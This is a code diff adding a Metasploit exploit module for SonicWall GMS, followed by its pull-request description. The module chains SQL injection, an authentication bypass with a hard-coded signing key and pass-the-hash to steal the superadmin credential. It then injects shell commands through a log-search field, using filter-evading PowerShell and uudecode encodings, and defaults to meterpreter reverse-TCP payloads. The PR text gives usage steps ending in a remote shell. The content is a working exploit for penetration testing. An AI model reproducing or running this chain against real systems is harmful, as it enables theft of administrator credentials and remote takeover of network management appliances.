+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+                'WritableDir' => '/tmp',
+                'DisablePayloadHandler' => false
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => ['win'],
+              'Arch' => [ARCH_CMD],
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',
+                'WritableDir' => '%TEMP%',
+                'DisablePayloadHandler' => false
+              }
+            }
+          ],
+          [
+            'Linux Command',
+            {
+              'Platform' => ['linux', 'unix'],
+              'Arch' => [ARCH_CMD],
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/generic',
+                'DisablePayloadHandler' => true
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+
+        'DisclosureDate' => '2023-07-12',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        },
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => '443'
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The root URI of the Sonicwall appliance', '/']),
+      ]
+    )
+
+    register_advanced_options([
+      # This varies by target, so don't define the default here
+      OptString.new('WritableDir', [true, 'A directory where we can write files']),
+      OptBool.new('AllowIncorrectPlatform', [true, "Don't validate the platform before attempting the exploit", false])
+    ])
+  end
+
+  def check
+    vprint_status("Validating SonicWall GMS is running on URI: #{target_uri.path}")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    )
+
+    # Basic sanity checks - the path should return a HTTP/200
+    return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?
+    return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200
+
+    # Ensure we're hitting plausible software
+    return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite .*)</
+
+    # Otherwise, probably safe?
+    CheckCode::Safe('Does not appear to be running SonicWall GMS')
+  end
+
+  # Exploits CVE-2023-34133 (SQL injection) + CVE-2023-34124 (auth bypass) to
+  # get a password hash
+  def get_password_hash
+    # attempt a sqli.
+    vprint_status('Attempting to use SQL injection to grab the password hash for the superadmin user...')
+
+    # SQL injection question to fetch the admin password
+    query = "' union select " +
+
+            # This must be a valid DOMAIN, which we can thankfully fetch from the DB
+            '(select ID from SGMSDB.DOMAINS limit 1), ' +
+
+            # These fields don't matter
+            "'', '', '', '', '', " +
+
+            # This field is returned, so use it to get the id and password for our
+            # the super user, if possible
+            "(select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0)," +
+
+            # The rest of the fields don't matter, end with a single quote to finish with a clean query
+            "'', '', '"
+    vprint_status("Generated SQL injection: #{query}")
+
+    # We need to sign our query with the SECRET_KEY
+    token = Base64.strict_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.const_get('SHA1').new, SECRET_KEY, query))
+    vprint_status("Generated a token using built-in secret key: #{token}")
+
+    # Build the URI
+    # Note that encoding space to '+' doesn't work, so we replace it with '%20'
+    uri = normalize_uri(target_uri.path, 'ws/msw/tenant', CGI.escape(query).gsub(/\+/, '%20'))
+
+    # Do it!
+    print_status('Sending SQL injection request to get the username/hash...')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => uri,
+      'headers' => {
+        'Auth' => '{"user": "system", "hash": "' + token + '"}',
+        'Accept-Encoding' => 'gzip;q=1.0,deflate;q=0.6,identity;q=0.3',
+        'Accept' => '*/*',
+        'Connection' => 'close'
+      }
+    )
+
+    # Sanity checks
+    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?
+    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200
+    fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.nil?
+
+    # This field has the SQL injection response
+    hash = res.get_json_document['alias']
+
+    # If the server responds with an error, it has no 'alias' field so the key
+    # is missing entirely (this is where it fails against patched targets)
+    fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil?
+
+    # If alias is present but contains nothing, that means our query got no
+    # results (probably there are no active users, or something?)
+    fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty?
+
+    # If there's no ':' in the response, something super weird happened
+    fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')
+
+    username, hash = hash.split(/:/, 2)
+    print_good("Found an account: #{username}:#{hash}")
+
+    [username, hash]
+  end
+
+  # Exploits CVE-2023-34132 (pass the hash)
+  def authenticate(username, hash)
+    # Grab server hashing token
+    vprint_status('Grabbing server hashing token...')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/appliance/login'),
+      'keep_cookies' => true
+    )
+    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?
+
+    # Look for the getPwdHash function call, as it contains the token we need
+    if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?
+      fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')
+    end
+
+    server_token = ::Regexp.last_match(1)
+    vprint_status("Got the server-side token: #{server_token}")
+
+    # Generate the client_hash by combining the server token + the stolen
+    # password hash
+    client_hash = Digest::MD5.hexdigest(server_token + hash)
+    vprint_status("Generated client token: #{client_hash}")
+
+    # Send the token
+    print_status('Attempting to authenticate with the client token + password hash...')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'action' => 'login',
+        'skipSessionCheck' => '0',
+        'needPwdChange' => '0',
+        'clientHash' => client_hash,
+        'password' => hash,
+        'applianceUser' => username,
+        'appliancePassword' => 'Nice Try',
+        'ctlTimezoneOffset' => '0'
+      }
+    })
+
+    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?
+
+    # Check the title to make sure it worked
+    html = res.get_html_document
+    title = html.at('title').text
+
+    # We can identify the platform based on the title
+    if title == TITLE_LINUX
+      print_good("Successfully logged in as #{username} (Linux detected!)")
+      return Msf::Module::Platform::Linux
+    elsif title == TITLE_WINDOWS
+      print_good("Successfully logged in as #{username} (Windows detected!)")
+      return Msf::Module::Platform::Windows
+    end
+
+    fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful")
+  end
+
+  def execute_command_windows(cmd)
+    vprint_status("Encoding (Windows) command: #{cmd}")
+
+    # While this is a shell command injection issue, an aggressive XSS filter
+    # prevents us from using a lot of important characters such as quotes and
+    # plus and ampersands and stuff. We can't even use Base64, because we can't
+    # use the + sign!
+    #
+    # We discovered that we could encode the command as integers, then use
+    # powershell to decode + execute it, so that's what this does.
+    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"
+    cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"
+
+    # Run the command
+    vprint_status("Running shell command: #{cmd}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'num' => '3232150',
+        'action' => 'file_system',
+        'task' => 'search',
+        'item' => 'application_log',
+        'criteria' => '*',
+        'width' => '500',
+        'searchFolder' => 'C:\\GMSVP\\etc\\',
+        'searchFilter' => "appliance.jar|#{cmd}| echo "
+      }
+    })
+
+    # This doesn't work, because our payload blocks and it eventually fails
+    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.nil?
+    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res&.body&.include?('invalid contents found')
+
+    print_good('Payload sent!')
+  end
+
+  def execute_command_linux(cmd)
+    vprint_status('Encoding (Linux) payload')
+
+    # Generate a filename
+    payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}")
+
+    # Wrap the command so we can execute arbitrary commands. There are several
+    # difficulties here, the first of which is that we don't have much in the
+    # way of tools. We're missing curl, wget, base64, python, ruby, even perl!
+    # The best tool I could find for staging a payload is uudecode, so we use
+    # that. (I noticed later that telnet exists, which could be another option)
+    #
+    # The good news is, with uudecode, we can send a base64 payload. The bad
+    # news is, we can't use '+', which means we can't use pure base64! To work
+    # around that, we replace '+' with '@', then use a bit of Bash magic to
+    # put it back! We also can't use quotes, so we have to do a mountain of
+    # escaping instead. The default shell is also /bin/sh, so we need to run
+    # bash explicitly for the `$()` substitutions to work.
+    #
+    # The summary is:
+    # * Use bash so we have access to $() (we can't use backticks)
+    # * Use uudecode to get a + into the $PLUS variable (using base64)
+    # * Generate a base64 payload, but replace + with ${PLUS} to bypass filter
+    # * Decode the payload into our payload file
+    # * Run the payload in the background with coproc
+    # * Delete the payload file
+    cmd = "bash -c #{Shellwords.escape("PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n==== | uudecode ; coproc #{Shellwords.escape(payload_file)} ; rm #{payload_file}")}"
+
+    # Run it!
+    vprint_status("Encoded shell command: #{cmd}")
+    print_status('Attempting to execute the shell injection payload')
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'num' => '3232150',
+        'action' => 'file_system',
+        'task' => 'search',
+        'item' => 'application_log',
+        'criteria' => '*',
+        'width' => '500',
+        'searchFolder' => '/opt/GMSVP/etc/',
+        'searchFilter' => "appliance.jar;#{cmd};echo "
+      }
+    })
+
+    # This doesn't work, because our payload blocks and it eventually fails
+    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.nil?
+    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res&.body&.include?('invalid contents found')
+
+    print_good('Payload sent!')
+  end
+
+  def exploit
+    # Get the password hash (from SQL injection + auth bypass)
+    username, hash = get_password_hash
+
+    # Use pass-the-hash to log in using that hash
+    detected_platform = authenticate(username, hash)
+
+    # Sanity-check the target
+    if !datastore['AllowIncorrectPlatform'] && !target.platform.platforms.include?(detected_platform)
+      fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set AllowIncorrectPlatform to true)")
+    end
+
+    case target['Type']
+    when :cmd
+      my_payload = payload.encoded
+    when :dropper
+      my_payload = generate_payload_exe(code: payload.encoded)
+    else
+      fail_with(Failure::BadConfig, "Unknown target type: #{target.type}")
+    end
+
+    # Run a command, using the platform specified in the target
+    if target.platform.platforms.include?(Msf::Module::Platform::Linux)
+      execute_command_linux(my_payload)
+    elsif target.platform.platforms.include?(Msf::Module::Platform::Windows)
+      execute_command_windows(my_payload)
+    else
+      fail_with(Failure::Unknown, "Unknown platform: #{platform}")
+    end
+  end
+end


### PR DESCRIPTION
Add a module for a remote code execution issue in SonicWall GMS. This works by exploiting several different issues fixed in the same patch, culminating in shell injection. One of the biggest difficulties was getting past their XSS filter, which takes exception to a lot of special characters. Both the Windows and Linux versions should be able to encode/run any command that's not too long.

## Verification

The affected software is SonicWall GMS 9.3.9320 (and likely earlier). The first patched version is 9.3.9330. They should be available in the "vulnerable software" folder, but need to be linked to a (free) SonicWall account + demo license. I documented how to get those going in the `documentation/` entry.

This should work against both the Windows version (which is a .exe installer), and a Linux version (which is a VM appliance, which, AFAICT, they don't give you a login for, or at least not one I could find).

Once the software is installed:

1. Start `msfconsole`
2. Do `use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124`
3. Set the appropriate `TARGET`, `RHOST`, `LHOST`, and possibly `FETCH_SRVHOST` (for Windows)
4. Do `run`
5. You should get meterpreter

Happy to help with running the software or testing the modules!